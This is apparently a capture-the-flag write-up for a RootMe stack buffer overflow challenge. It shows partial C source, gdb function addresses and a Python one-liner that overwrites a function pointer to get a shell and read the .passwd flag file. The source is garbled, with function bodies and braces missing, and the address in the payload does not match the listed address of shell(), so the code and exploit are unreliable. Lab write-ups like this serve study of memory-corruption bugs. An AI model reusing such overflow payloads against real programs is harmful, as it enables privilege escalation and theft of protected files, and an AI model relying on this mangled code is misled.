ELF x86: Stack buffer overflow basic 2

RootMe challenge: ELF x86 - Stack buffer overflow basic 2: An intermediate level to familiarize yourself with stack overflows.

Environment configuration:

PIE 	Position Independent Executable 	 No 
RelRO 	Read Only relocations 	                 No 
NX 	Non-Executable Stack 	                 Yes 
ASLR 	Address Space Layout Randomization 	 No 
SF 	Source Fortification 	                 No 
SSP 	Stack-Smashing Protection 	         No 
SRC 	Source code access 	                 Yes 

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void shell() {
    setreuid(geteuid(), geteuid());
void sup() {
    printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n");
void main()
    int var;
    void (*func)()=sup;
    char buf[128];

app-systeme-ch15@challenge02:~$ gdb ch15
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Reading symbols from ch15...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x08048350  _init
0x08048390  fgets@plt
0x080483a0  geteuid@plt
0x080483b0  puts@plt
0x080483c0  system@plt
0x080483d0  setreuid@plt
0x080483e0  __libc_start_main@plt
0x080483f0  __gmon_start__@plt
0x08048400  _start
0x08048440  _dl_relocate_static_pie
0x08048450  __x86.get_pc_thunk.bx
0x08048460  deregister_tm_clones
0x080484a0  register_tm_clones
0x080484e0  __do_global_dtors_aux
0x08048510  frame_dummy
0x08048516  shell
0x08048559  sup
0x08048584  main
0x080485de  __x86.get_pc_thunk.ax
0x080485f0  __libc_csu_init
---Type <return> to continue, or q <return> to quit---q
app-systeme-ch15@challenge02:~$ cat <(python -c "print 'A'*128 + '\x64\x84\x04\x08'") - | ./ch15
cat .passwd